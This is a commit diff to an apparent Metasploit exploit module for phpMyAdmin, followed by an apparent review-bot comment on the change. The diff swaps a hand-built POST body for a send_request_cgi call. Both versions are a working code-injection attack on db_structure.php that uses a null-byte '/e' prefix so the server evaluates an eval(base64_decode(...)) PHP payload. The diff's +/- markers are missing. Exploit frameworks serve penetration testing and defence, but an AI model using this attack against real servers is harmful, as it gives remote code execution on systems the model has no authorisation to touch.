Change to send_rq_cgi

unstable
Meatballs 2013-04-26 19:19:11 +01:00
parent 54233e9fba
commit a17d61897d
1 changed files with 15 additions and 30 deletions


@ -37,6 +37,7 @@ class Metasploit3 < Msf::Exploit::Remote
'Arch' => ARCH_PHP, 'Arch' => ARCH_PHP,
'Payload' => 'Payload' =>
{ {
'BadChars' => "&\n=+%",
'DisableNops' => true, 'DisableNops' => true,
'Compat' => { 'ConnectionType' => 'find' } 'Compat' => { 'ConnectionType' => 'find' }
}, },
@ -155,37 +156,21 @@ class Metasploit3 < Msf::Exploit::Remote
end end
db = rand_text_alpha(3+rand(3)) db = rand_text_alpha(3+rand(3))
pay = Rex::Text.encode_base64(payload.encoded)
evil = []
evil << "query_type=replace_prefix_tbl"
evil << "db=#{db}"
evil << "selected%5B0%5D=#{db}"
evil << "token=#{token}"
evil << "from_prefix=%2Fe%00"
evil << "to_prefix=#{Rex::Text.uri_encode("eval(base64_decode('#{pay}'))", 'hex-random')}"
evil << "mult_btn=Yes"
data = "" exploit_result = send_request_cgi({
evil.shuffle! 'uri' => uri('db_structure.php'),
0.upto(evil.count-1) do |i| 'method' => 'POST',
if i == 0 'cookie' => cookie,
data << evil[i] 'vars_post' => {
else 'query_type' => 'replace_prefix_tbl',
data << '&' << evil[i] 'db' => db,
end 'selected[0]' => db,
end 'token' => token,
'from_prefix' => "/e\0",
exploit_result = send_request_raw({ 'to_prefix' => payload.encoded,
'uri' => uri('db_structure.php'), 'mult_btn' => 'Yes'
'method' => 'POST', }
'data' => data, },1)
'cookie' => cookie,
'headers' => { 'Content-Type' => 'application/x-www-form-urlencoded' }
},2)
if exploit_result
print_error("Response retrieved from server, exploit failed.")
end
end end
end end
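Review bot: The return value of `send_request_cgi` is still assigned to `exploit_result`, but the `if exploit_result` / `print_error(...)` check that read it appears only on the old side, so on the new side the local looks unused and the operator gets no status message. Either drop the assignment or keep a short check after the call so a returned response is still reported as a failure. The timeout argument also changes from `2` to `1` with no explanation; a comment such as `# short timeout: a response here means the request did not take effect` would record the intent. The new `'BadChars' => "&\n=+%"` entry would also benefit from a one-line comment saying why those characters are excluded now that `vars_post` handles the form encoding. The enclosing method starts outside the hunk and the page has lost its +/- markers, so this reading is inferred from how the old and new lines are paired.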